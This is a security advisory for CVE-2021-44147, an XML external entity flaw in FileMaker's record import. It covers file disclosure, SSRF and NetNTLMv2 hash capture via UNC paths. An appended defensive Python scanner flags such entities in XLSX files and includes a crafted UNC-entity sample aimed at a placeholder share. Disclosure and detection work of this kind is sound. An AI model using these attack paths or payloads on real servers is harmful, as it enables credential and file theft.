CVE-2021-44147: XML External Entity Vulnerability in Claris FileMaker

A couple of months ago I looked more deeply into the “Import Records” functionality in FileMaker, especially the XML parsing, and was wondering whether any XXE vulnerability might exist and how one could exploit it in technically interesting ways. The vulnerability is/was indeed there and can lead to local file disclosure and server-side request forgery in various components of the FileMaker platform. The following is a description of the vulnerability including potential exploitation paths.

If you’re running FileMaker Server, make sure to install patch 19.4.1 to mitigate this attack vector. The issue was privately disclosed to Claris, Inc. and this write-up was only released after a patch was available (see timeline below).

The XML parser used to parse XML files (including XLSX) during import (the “Import Records” action) does not prevent the use of external entities. This allows an attacker to perform HTTP requests to arbitrary hosts, including internal ones, and in addition allows reading and exfiltrating the contents of arbitrary files, provided they can be transported via an HTTP GET or included within an XML document without further encoding. When the FileMaker Server is running under a custom Windows user, it is also possible to use UNC paths in external entities, make that user connect to a share and through that steal and potentially crack the NetNTLMv2 hash to reveal the user’s password.

The proof-of-concepts below demonstrate this with an fmp12 file hosted via WebDirect. In the first example we make a request to a private host by uploading a crafted XLSX file. In the second and third examples we steal the private key of the FileMaker Server in-band and out-of-band, respectively. In the last example we explore the scenario where we initiate an SMB connection to capture the NetNTLMv2 hash.
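As an added example (not part of this write-up or of any Claris code), the following Python pre-import check unpacks an XLSX, flags every XML part whose DTD declares a SYSTEM or PUBLIC entity, and classifies the target as UNC, local file or HTTP, the three paths described above. The minimal workbook zip, the `classify_target` labels and the share host are constructed placeholders for the demonstration.

```python
import re
import zipfile
from io import BytesIO

# An XLSX is a zip of XML parts. The write-up describes FileMaker's import parser
# honouring external entities declared in those parts, so the check runs before
# the file ever reaches "Import Records".
ENTITY_RE = re.compile(
    rb'<!ENTITY\s+(%\s*)?[\w.-]+\s+(?:SYSTEM|PUBLIC\s+"[^"]*")\s*"([^"]*)"',
    re.IGNORECASE)

def classify_target(uri: bytes) -> str:
    """Triage label for an external entity target (assumed labels, not FileMaker's)."""
    u = uri.decode("utf-8", "replace").strip()
    if u.startswith("\\\\") or re.match(r"file:/{4,}", u):
        return "unc"         # SMB share: NetNTLMv2 capture risk
    if u.startswith("file:"):
        return "local-file"  # local file disclosure
    if re.match(r"https?://", u, re.IGNORECASE):
        return "http"        # SSRF to internal hosts or out-of-band channel
    return "other"

def scan_xlsx(data: bytes) -> list:
    """Return one finding per external entity declaration found in any XML part."""
    findings = []
    with zipfile.ZipFile(BytesIO(data)) as zf:
        for name in zf.namelist():
            if not name.lower().endswith((".xml", ".rels")):
                continue
            part = zf.read(name)
            if b"<!DOCTYPE" not in part.upper():
                continue  # no DTD, so no place to declare an entity
            for m in ENTITY_RE.finditer(part):
                findings.append({"part": name, "parameter": bool(m.group(1)),
                                 "target": m.group(2).decode("utf-8", "replace"),
                                 "kind": classify_target(m.group(2))})
    return findings

def build_sample_xlsx(workbook_xml: bytes) -> bytes:
    """Constructed minimal workbook zip for testing; not a full OOXML package."""
    buf = BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("[Content_Types].xml", b'<?xml version="1.0"?><Types/>')
        zf.writestr("xl/workbook.xml", workbook_xml)
    return buf.getvalue()

CLEAN = b'<?xml version="1.0"?><workbook><sheets/></workbook>'
# Constructed sample of the UNC-in-entity case; the share host is a placeholder.
UNC_SAMPLE = (b'<?xml version="1.0"?><!DOCTYPE workbook [<!ENTITY ext SYSTEM '
              b'"\\\\share.example.invalid\\x">]><workbook>&ext;</workbook>')

if __name__ == "__main__":
    for label, xml in (("clean", CLEAN), ("unc", UNC_SAMPLE)):
        print(label, scan_xlsx(build_sample_xlsx(xml)))
```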